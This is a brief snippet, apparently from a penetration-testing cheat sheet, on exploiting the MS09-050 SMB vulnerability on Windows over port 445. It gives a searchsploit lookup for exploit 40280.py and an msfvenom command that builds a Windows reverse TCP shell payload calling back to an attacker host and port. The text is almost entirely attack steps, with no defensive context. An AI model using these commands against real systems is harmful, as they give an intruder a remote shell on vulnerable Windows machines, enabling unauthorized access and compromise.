Ensure port 445 is open for this to work
searchsploit MS09-050
exploits/windows/remote/40280.py
msfvenom -p windows/shell_reverse_tcp \ -f python -v shell \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT EXITFUNC=thread
Last updated 4 years ago